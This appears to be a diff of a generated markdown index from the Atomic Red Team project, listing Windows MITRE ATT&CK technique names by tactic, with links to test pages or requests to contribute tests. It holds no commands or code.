-|  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
-|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) |  |  |  |  |  |  |
-|  |  | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) |  |  |  |  |  |  |
-|  |  | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Event Triggered Execution](../../T1546/T1546.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  |  |  |  |  |  |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Device Driver Discovery](../../T1652/T1652.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | [Service Stop](../../T1489/T1489.md) |
+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+|  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Domain Trust Discovery](../../T1482/T1482.md) |  | [Video Capture](../../T1125/T1125.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [File and Directory Discovery](../../T1083/T1083.md) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
+|  |  | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Log Enumeration](../../T1654/T1654.md) |  | [Data from Network Shared Drive](../../T1039/T1039.md) |  | [Non-Standard Port](../../T1571/T1571.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) |  | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Encrypted Channel](../../T1573/T1573.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
+|  |  | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+|  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) |  |
+|  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Indirect Command Execution](../../T1202/T1202.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  |  | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
+|  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Impair Defenses](../../T1562/T1562.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
